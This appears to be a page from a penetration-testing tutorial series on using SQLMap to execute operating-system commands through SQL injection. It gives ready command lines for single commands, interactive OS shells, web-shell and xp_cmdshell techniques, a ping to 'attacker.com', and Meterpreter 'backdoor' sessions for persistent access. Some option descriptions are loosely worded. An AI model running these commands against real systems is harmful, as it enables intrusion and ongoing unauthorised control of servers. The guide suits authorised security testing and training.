OS Command Execution

Learn how to execute operating system commands through SQL injection vulnerabilities using SQLMap

SQLMap provides several methods to execute operating system commands on the target server through SQL injection vulnerabilities. These techniques depend on the database management system and the privileges available.

Basic OS Command Execution

Single Command Execution (--os-cmd)

To execute a single operating system command:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-cmd="whoami"

This executes the specified command and returns its output. It's useful for quick verification of command execution capabilities.

Interactive OS Shell (--os-shell)

To obtain an interactive shell:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell

This provides an interactive command prompt where you can execute multiple commands on the target system.

DBMS-Specific Techniques

Different database systems have different mechanisms for command execution:

MySQL

For MySQL, SQLMap typically uses:

SELECT ... INTO OUTFILE to write a web shell
User-defined functions (UDFs) if the database user has sufficient privileges

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --dbms=mysql

Microsoft SQL Server

For SQL Server, SQLMap uses:

xp_cmdshell extended stored procedure
CLR assemblies if xp_cmdshell is disabled

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --dbms=mssql

PostgreSQL

For PostgreSQL, SQLMap uses:

COPY TO/FROM PROGRAM functionality
Custom user-defined functions

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --dbms=postgresql

Oracle

For Oracle, SQLMap uses:

Java stored procedures
External tables
PL/SQL packages

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --dbms=oracle

Advanced Command Execution Options

Specifying Command Prompt Type

You can specify the type of shell to use:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --os-pwn --msf-path=/path/to/metasploit --tmp-path=/tmp

Out-of-Band Command Execution

For situations where direct command output retrieval is not possible:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-cmd="ping -c 4 attacker.com" --technique=T

This executes commands that produce observable side effects (like network connections) rather than direct output.

Establishing Persistent Access

Meterpreter Shell (--os-pwn)

To establish a Meterpreter session using Metasploit:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-pwn --msf-path=/path/to/metasploit

This creates a more sophisticated backdoor using Metasploit's capabilities.

Custom Backdoor (--os-smbrelay)

To create a custom backdoor:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-smbrelay

Troubleshooting Command Execution

If command execution fails, try these approaches:

Verify the database user has sufficient privileges
Try different command execution techniques with --technique
Use stacked queries if supported by the injection point
Try different output retrieval methods with --tmp-path
Check if antivirus or security controls are blocking execution

Remember that command execution capabilities vary significantly based on:

The specific DBMS version
Database user privileges
Server configuration
Security controls in place

PreviousAdvanced Techniques

NextPrivilege Escalation

Penetration Testing Guide

Hashcat Guide

Hydra Guide

Nikto Guide

OWASP ZAP Guide

Burp Suite Guide

XSS Guide

SQLMap Guide

Reverse Shells Guide

John the Ripper Guide

Nmap Guide